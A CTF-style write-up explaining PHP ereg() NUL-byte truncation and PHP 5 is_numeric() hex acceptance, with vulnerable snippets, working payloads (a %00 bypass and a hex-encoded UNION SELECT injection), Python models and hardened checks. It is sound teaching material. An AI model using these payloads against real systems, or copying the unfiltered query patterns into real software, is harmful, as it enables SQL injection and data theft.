CTF web challenge summary: PHP function vulnerabilities

xiaoxiao 2021-02-28

PHP function vulnerability summary

1. ereg() truncation vulnerability

Code:

<?php
session_start();
if (isset($_POST['submit'])) {
    $verifycode = $_POST['verifycode'];
    $b = false;
    // ereg() receives the value as a C string, so matching stops at the first NUL byte.
    if (@ereg("^[1-9]+$", $verifycode) === FALSE) {
        $b = false;
        echo 'b is false';
    } else if (strpos($verifycode, 'xiaoboshifudaiwofei') !== FALSE) {
        // strpos() is binary-safe: it searches the whole value, NUL byte included.
        $b = true;
        echo 'b is true';
    }
}
?>

Payload (URL-encoded value of the verifycode field):

9%00xiaoboshifudaiwofei

PHP decodes %00 into a real NUL byte. ereg() treats the value as a C string, so it stops at the NUL and matches only "9" against ^[1-9]+$, while strpos() is binary-safe and sees the whole value, so it finds the marker and the check prints 'b is true'. Without the NUL, a value such as 9xiaoboshifudaiwofei fails the regex and the check prints 'b is false'. ereg() was deprecated in PHP 5.3 and removed in PHP 7.0; preg_match() with a pattern such as /\A[1-9]+\z/ matches the entire buffer, NUL included, and is not affected by this truncation.
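The truncation described above, as an added Python model of the two PHP checks (this is not code from the original writeup): ereg_like() cuts the subject at the first NUL byte the way the legacy ereg extension's C-string interface does, strpos_like() searches the whole buffer, and hardened_check() shows the preg_match-style full-buffer match that closes the gap. The NUL-truncation model and the function names are assumptions made for this example.

```python
import re
from urllib.parse import quote

# Marker the challenge's strpos() looks for (taken from the page's code).
SECRET = b"xiaoboshifudaiwofei"


def ereg_like(pattern: bytes, subject: bytes) -> bool:
    """Model of ereg(): the subject is handed over as a C string, so everything
    after the first NUL byte is invisible to the matcher. Returns True on a match
    (ereg() itself returns FALSE on no match, which is what the page's check tests).
    Assumption: NUL truncation is the only ereg() behaviour that matters here."""
    truncated = subject.split(b"\x00", 1)[0]
    return re.search(pattern, truncated) is not None


def strpos_like(haystack: bytes, needle: bytes) -> bool:
    """strpos() is binary-safe: it sees the whole buffer, NUL bytes included."""
    return haystack.find(needle) != -1


def vulnerable_check(verifycode: bytes) -> bool:
    """Mirrors the challenge logic: ereg() must not return FALSE, then strpos() must find the marker."""
    if not ereg_like(rb"^[1-9]+$", verifycode):
        return False
    return strpos_like(verifycode, SECRET)


def hardened_check(verifycode: bytes) -> bool:
    """preg_match('/\\A[1-9]+\\z/', ...) equivalent: PCRE is binary-safe and the anchors
    force the whole buffer to be digits, so a value that passes can never contain the marker."""
    if re.fullmatch(rb"[1-9]+", verifycode) is None:
        return False
    return strpos_like(verifycode, SECRET)


def build_payload(prefix: bytes = b"9"):
    """Build the raw bytes PHP will see after decoding the POST body, plus the URL-encoded form."""
    raw = prefix + b"\x00" + SECRET
    return raw, quote(raw)  # quote() accepts bytes; NUL becomes %00


if __name__ == "__main__":
    raw, encoded = build_payload()
    print("POST verifycode=" + encoded)
    print("vulnerable check passes:", vulnerable_check(raw))          # True
    print("same value without NUL:", vulnerable_check(b"9" + SECRET))  # False
    print("hardened check passes:", hardened_check(raw))              # False
```

The second print shows why the payload needs the NUL: without it the value is not all digits and ereg() returns FALSE before strpos() is ever reached.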

2. is_numeric() vulnerability

Code:

<?php
if (!is_numeric($page)) {
    die("page must be a number!");
}
if ($page < 1) $page = 1;
// $page is interpolated unquoted; is_numeric() is the only filter in front of the query.
$sql = "update page set num=$page";
$res = mysql_my_query($sql);
if ($res) {
    echo "<script>alert('update success!');</script>";
    echo("<script>location.href='./index.php?action=admin&mode=index'</script>");
} else {
    echo "<script>alert('update fail!');</script>";
    die();
}

In PHP 5.x, is_numeric() also accepts hexadecimal strings of the form 0x... as numeric (PHP 7.0 removed this; such strings are no longer numeric there). A hex-encoded string therefore passes the check and is interpolated into the query unquoted, and MySQL decodes a 0x... literal into the bytes it encodes, so the value that reaches the database is the original text. The query shown here only stores that text in the num column; the snippet does not show where num is used afterwards.

import binascii

a = '1 union all select flag,flag,flag,flag from flags'
# Python 3: hexlify() needs bytes, and decode() turns the result back into text.
print(binascii.hexlify(a.encode()).decode())
# 3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773

page parameter:

0x3120756e696f6e20616c6c2073656c65637420666c61672c666c61672c666c61672c666c61672066726f6d20666c616773
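The hex trick above, generalised as an added Python example (not code from the original writeup): it encodes an arbitrary string as a MySQL 0x literal, models how PHP 5 and PHP 7 is_numeric() treat that literal, decodes it the way MySQL does, and contrasts the page's unquoted interpolation with a digits-only check. The two is_numeric() regexes are a simplified model (assumption: they reproduce the PHP 5.6 and PHP 7.0 behaviour for the inputs used here), the `$page < 1` clamp is omitted, and the function names are this example's own.

```python
import re

# Constructed example input: the injection text the writeup hex-encodes.
INJECTION = "1 union all select flag,flag,flag,flag from flags"

# Simplified is_numeric() models. Both accept leading whitespace, optional sign,
# and a decimal or float literal; PHP 5 additionally accepts a bare 0x hex literal
# (no sign, no trailing characters). Assumption: good enough for the inputs below.
_DECIMAL = re.compile(r"[ \t\n\r\x0b\x0c]*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?")
_PHP5_HEX = re.compile(r"[ \t\n\r\x0b\x0c]*0[xX][0-9a-fA-F]+")


def php5_is_numeric(value: str) -> bool:
    return bool(_DECIMAL.fullmatch(value) or _PHP5_HEX.fullmatch(value))


def php7_is_numeric(value: str) -> bool:
    return bool(_DECIMAL.fullmatch(value))


def to_mysql_hex_literal(text: str) -> str:
    """Encode text as a MySQL 0x... literal (same digits the page's binascii.hexlify() call yields)."""
    return "0x" + text.encode("utf-8").hex()


def mysql_decode_hex_literal(literal: str) -> str:
    """What MySQL sees once it parses a 0x... literal: the bytes it encodes, as a string."""
    if literal[:2].lower() != "0x":
        raise ValueError("not a 0x literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def vulnerable_update_sql(page: str):
    """The page's logic under PHP 5 semantics: is_numeric() is the only filter before
    the value is interpolated unquoted. Returns the SQL text, or None if rejected."""
    if not php5_is_numeric(page):
        return None
    return f"update page set num={page}"


def hardened_page(page: str) -> int:
    """Hardened equivalent: require decimal digits only (what ctype_digit() checks) and
    pass an int to a bound parameter instead of interpolating the raw string."""
    if re.fullmatch(r"[0-9]{1,9}", page) is None:
        raise ValueError("page must be a decimal integer")
    return max(int(page), 1)


if __name__ == "__main__":
    literal = to_mysql_hex_literal(INJECTION)
    print("page=" + literal)
    print("PHP 5 is_numeric:", php5_is_numeric(literal))   # True
    print("PHP 7 is_numeric:", php7_is_numeric(literal))   # False
    print("SQL sent:", vulnerable_update_sql(literal))
    print("MySQL decodes the literal to:", mysql_decode_hex_literal(literal))
```

hardened_page() rejects the hex form outright, and because it returns an int rather than the caller's string, nothing other than a small decimal number can reach the query even if the check were later relaxed.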
Please credit the original when reposting: https://www.6miu.com/read-20547.html
